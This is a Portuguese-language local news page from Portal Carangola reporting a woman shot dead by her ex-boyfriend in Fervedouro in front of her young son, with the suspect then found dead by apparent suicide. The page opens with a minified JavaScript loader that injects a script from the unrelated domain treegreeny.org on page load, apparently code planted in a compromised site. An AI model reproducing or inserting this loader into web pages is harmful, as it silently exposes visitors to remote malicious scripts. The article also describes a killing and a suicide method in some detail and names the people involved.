;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fervedouro: mulher é morta pelo ex na frente do filho de 9 anos; autor se suicidou pouco depois - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Fervedouro: mulher é morta pelo ex na frente do filho de 9 anos; autor se suicidou pouco depois

Mais um crime chocante aconteceu na região. Em Fervedouro, na noite desta quarta-feira (3), por volta das 21h, uma mulher de 26 anos foi assassinada com dois tiros, na frente de seu filho de nove anos, na residência onde a vítima morava com o garoto e a filha caçula, de seis anos. O autor seria o ex-namorado da jovem, que pouco depois do crime, foi encontrado morto, em sua residência, com uma corda enrolada no pescoço e com um tiro na cabeça.
Segundo o boletim de ocorrência da Polícia Militar (PM), a vítima, Lucimar da Silva, era natural da cidade de Carangola e trabalhava como cozinheira. O suposto autor, Lucimar Augusto das Graças, 38 anos, residia na zona rural de São Francisco do Glória, município vizinho a Fervedouro, e era lavrador.
A perícia da Polícia Civil (PC) de Muriaé realizou os trabalhos técnicos nos dois imóveis onde os corpos se encontravam e os mesmos foram encaminhados ao IML de Muriaé.
A hipótese mais forte, pelo menos até o momento, é de crime passional, e o caso será investigado pela equipe da delegacia da cidade de Carangola.

Lucimar da Silva foi baleada na casa onde morava com o casal de filhos, na noite desta quarta.
Lucimar da Silva foi baleada na casa onde morava com o casal de filhos, na noite desta quarta.

Fonte/Foto:Rádio Muriaé

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.